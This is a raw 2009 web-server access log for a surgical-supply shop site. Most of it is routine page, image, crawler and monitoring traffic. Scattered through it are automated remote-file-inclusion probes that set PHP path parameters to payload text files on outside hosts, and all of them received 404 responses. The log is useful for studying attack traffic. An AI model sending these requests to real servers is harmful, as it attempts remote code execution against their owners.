88.246.245.86 - - [28/Jul/2009:03:13:51 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:51 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:52 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:52 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:54 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:13:56 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:14:00 -0400] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L013BA3470905E10092C2037+WSEQ(S0060):1+OUITEM(A0200):5052001 HTTP/1.1" 200 27024 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:14:04 -0400] "GET /images/items/CALCIUMSULFATE_FULL.JPG HTTP/1.1" 200 3728 "http://www.aceonlinestore.com/cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L013BA3470905E10092C2037+WSEQ(S0060):1+OUITEM(A0200):5052001" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
122.111.120.81 - - [28/Jul/2009:03:14:38 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:14:38 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:14:39 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:14:39 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
88.246.245.86 - - [28/Jul/2009:03:14:45 -0400] "GET /images/pf-b.gif HTTP/1.1" 200 813 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
122.111.120.81 - - [28/Jul/2009:03:15:19 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76277 "http://www.acesurgical.com/connect_referrals.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:20 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:21 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:23 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:23 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:23 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:23 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:24 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
122.111.120.81 - - [28/Jul/2009:03:15:27 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12"
89.234.7.92 - - [28/Jul/2009:03:16:33 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:16:33 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:16:35 -0400] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:16:35 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:16:35 -0400] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:16:38 -0400] "GET /logs/access_log.Q109061200//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:03:16:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.28 - - [28/Jul/2009:03:17:32 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
88.246.245.86 - - [28/Jul/2009:03:17:53 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
88.246.245.86 - - [28/Jul/2009:03:17:53 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):13+RNSUBS (S0040):0" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)"
220.181.7.97 - - [28/Jul/2009:03:19:53 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /logs/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /logs/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /logs/access_log.Q109060800%20%20/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:20:26 -0400] "GET /errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:03:21:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
74.55.30.194 - - [28/Jul/2009:03:21:55 -0400] "GET /logs/access_log.Q109061800%20%20/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.30.194 - - [28/Jul/2009:03:21:55 -0400] "GET /logs/access_log.Q109061800%20%20/errors.php?error=http://fbe.trakya.edu.tr/mysqldumper/work/structure/respon1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:08 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:08 -0400] "GET /logs/error_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:08 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:13 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:14 -0400] "GET /logs/error_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:03:23:23 -0400] "GET /logs/access_log.Q109071900 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.169 - - [28/Jul/2009:03:23:38 -0400] "GET /logs/error_log.Q107112300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [28/Jul/2009:03:23:43 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.53.70.114 - - [28/Jul/2009:03:23:43 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.70.114 - - [28/Jul/2009:03:23:43 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:23:46 -0400] "GET /logs/error_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.53.70.114 - - [28/Jul/2009:03:23:50 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:24:19 -0400] "GET /logs/access_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
74.6.22.169 - - [28/Jul/2009:03:24:55 -0400] "GET /scripts/browser_ns.js HTTP/1.0" 200 9437 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
74.53.70.114 - - [28/Jul/2009:03:25:20 -0400] "GET /logs/access_log.Q109071200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.53.70.114 - - [28/Jul/2009:03:25:20 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:25:22 -0400] "GET /logs/access_log.Q109070100%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:01 -0400] "GET /logs/access_log.Q109070600%20%20//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:01 -0400] "GET //includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:01 -0400] "GET /logs//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:07 -0400] "GET //includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:07 -0400] "GET /logs//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:07 -0400] "GET /logs/access_log.Q109070600%20%20//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:13 -0400] "GET /logs//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:13 -0400] "GET //includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.98.134.54 - - [28/Jul/2009:03:26:13 -0400] "GET /logs/access_log.Q109070600%20%20//includes/todofleetcontrol.php?xnova_root_path=http://www.ohmyflash.com/uiu.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:26:19 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:26:26 -0400] "GET /logs/error_log.Q109062400//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
117.110.74.195 - - [28/Jul/2009:03:26:27 -0400] "GET /logs/error_log.Q109061200//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
89.234.7.92 - - [28/Jul/2009:03:26:27 -0400] "GET /logs/access_log.Q109061200%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??%20? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:03:26:41 -0400] "GET /logs//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:03:26:41 -0400] "GET /logs/error_log.Q109062400%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:03:26:41 -0400] "GET //includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
209.59.12.99 - - [28/Jul/2009:03:26:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
124.0.139.129 - - [28/Jul/2009:03:26:58 -0400] "GET /logs/access_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
124.0.139.129 - - [28/Jul/2009:03:26:58 -0400] "GET /logs/error_log.Q109061200%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
